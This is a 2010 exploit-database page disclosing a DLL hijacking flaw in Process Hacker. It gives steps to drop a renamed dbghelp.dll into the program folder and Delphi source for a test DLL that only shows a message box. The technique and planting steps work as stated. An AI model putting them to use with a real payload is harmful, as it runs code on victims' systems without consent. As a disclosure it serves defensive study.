[local exploits] - Process Hacker Dll Hijacking Exploit
Posted on 08 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Process Hacker Dll Hijacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: STRELiTZIA' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================== Process Hacker Dll Hijacking Exploit ==================================== Exploit Title : [Process Hacker Dll Hijacking Exploit] Date : [09 Sept 2010] Author : [STRELiTZIA] Software : [Process Hacker] Tested on : [Windows Xp SP3] ============================ = Description = ============================ Process Hacker search and laod %Process Hacker%dbghelp.dll library without checks, or any visual warning messages related to library modifications. Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application. ============================ = Instructions = ============================ 1- Copy "Test.dll" into "%Process Hacker% folder" 2- Rename "Test.dll" to "dbghelp.dll" ============================ = Tests = ============================ - Launch Process Hacker. ============================ = Test Dll Source "Delphi" = ============================ Library Test; uses Windows; begin MessageBoxA ( 0, PChar('Yep, I''m running in your system without your permission.'), PChar('Sample'), MB_ICONSTOP ); end. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre></body></html>
